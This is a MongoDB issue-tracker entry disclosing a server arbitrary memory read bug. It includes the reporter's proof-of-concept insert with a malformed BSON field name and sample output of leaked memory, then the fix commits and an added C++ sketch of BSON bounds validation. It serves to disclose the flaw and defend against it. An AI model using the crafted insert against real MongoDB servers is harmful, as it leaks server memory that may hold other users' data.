[SERVER-7769] use --objcheck by default, Server arbitrary memory reading
Created: 27/Nov/12  Updated: 11/Jul/16  Resolved: 20/Dec/12

Status: Closed
Project: Core Server
Component/s: None
Affects Version/s: None
Fix Version/s: 2.3.2

Type: Bug
Priority: Major - P3
Reporter: Yury
Assignee: Eliot Horowitz (Inactive)
Resolution: Done
Votes: 1
Labels: None
Remaining Estimate: Not Specified
Time Spent: Not Specified
Original Estimate: Not Specified

Issue Links:
Duplicate
is duplicated by SERVER-7691 Java driver is capable of crashing mo... Closed
is duplicated by SERVER-8272 Add command line option for "noObjcheck" Closed
Related
is related to SERVER-6519 MongoDB Crash Under High Load Closed
Operating System: ALL
Participants:

 Description   

The specialists of the Positive Research center have detected a "Server arbitrary memory reading" vulnerability in the MongoDB application.

Because of incorrect execution of the BSON-document length in a column name in the insert command, it's possible to insert a record which can contain base64-encrypted server memory chunks.

Example of use:

Suppose you have a table "dropme" with write permission.

Execute the following command with a result:

> db.dropme.insert({"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"})
> db.dropme.find()

{ "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

After base64-code decryption you can get bytes from random server memory chunks.

Credits

The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)



 Comments   
Comment by auto [ 20/Dec/12 ]

Author: Eliot Horowitz <eliot@10gen.com>, 2012-12-20T03:15:03Z

Message: SERVER-7769 - turn objcheck on by default and use new fast bson validate
Branch: master
https://github.com/mongodb/mongo/commit/f9817a6cf64bdba8e1e1cef30a798110df746b58

Comment by auto [ 18/Dec/12 ]

Author: Eliot Horowitz <eliot@10gen.com>, 2012-12-18T14:40:08Z

Message: SERVER-7769 - fast bson validate
Branch: master
https://github.com/mongodb/mongo/commit/6889d1658136c753998b4a408dc8d1a3ec28e3b9
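
A minimal sketch of the kind of structural check that object validation on insert implies: every length a BSON document declares is compared with the bytes actually present before the value is accepted. This is an added example, not the code from the commits linked above; `validateBson`, `readLen`, the sample buffers and the reduced set of supported element types are assumptions made for illustration.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>
using Buf = std::vector<uint8_t>;

// Read a little-endian int32 at b[pos]; fails if fewer than 4 bytes remain before end.
static bool readLen(const Buf& b, size_t pos, size_t end, uint32_t& out) {
    if (end - pos < 4) return false;
    out = b[pos] | (b[pos + 1] << 8) | (b[pos + 2] << 16) | (uint32_t(b[pos + 3]) << 24);
    return true;
}

// True only if [pos, end) holds exactly one structurally sound BSON document.
bool validateBson(const Buf& b, size_t pos, size_t end) {
    uint32_t total = 0, n = 0;
    if (pos > end || end > b.size() || !readLen(b, pos, end, total)) return false;
    if (total < 5 || total != end - pos || b[end - 1] != 0) return false;
    size_t p = pos + 4, last = end - 1;          // elements occupy [p, last)
    while (p < last) {
        uint8_t type = b[p++];
        while (p < last && b[p] != 0) ++p;       // field name (cstring)
        if (p >= last) return false;             // name not terminated in bounds
        ++p;
        uint64_t need = 0;                       // bytes the value claims to occupy
        switch (type) {
            case 0x01: case 0x12: need = 8; break;               // double, int64
            case 0x08: need = 1; break;                          // bool
            case 0x0A: break;                                    // null
            case 0x10: need = 4; break;                          // int32
            case 0x02: case 0x05: case 0x03: case 0x04:          // length-prefixed
                if (!readLen(b, p, last, n)) return false;
                need = type == 0x02 ? 4ull + n : type == 0x05 ? 5ull + n : n;
                break;
            default: return false;               // other types: rejected in this sketch
        }
        if (need > last - p) return false;       // declared length overruns the buffer
        if (type == 0x02 && (n == 0 || b[p + need - 1] != 0)) return false;
        if ((type == 0x03 || type == 0x04) && !validateBson(b, p, p + need)) return false;
        p += need;
    }
    return p == last;
}

// Constructed samples: {"hello": "world"}, and a binary field declaring 0x3001 bytes.
const Buf kValid = {0x16,0,0,0, 0x02,'h','e','l','l','o',0, 6,0,0,0, 'w','o','r','l','d',0, 0};
const Buf kOverlong = {0x17,0,0,0, 0x05,'h','e','l','l','o',0, 0x01,0x30,0,0, 0, 'w','o','r','l','d',0, 0};
```

`validateBson(kValid, 0, kValid.size())` accepts the well-formed document, while the same call on `kOverlong` fails at the bounds check because the binary element claims more bytes than the buffer holds.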
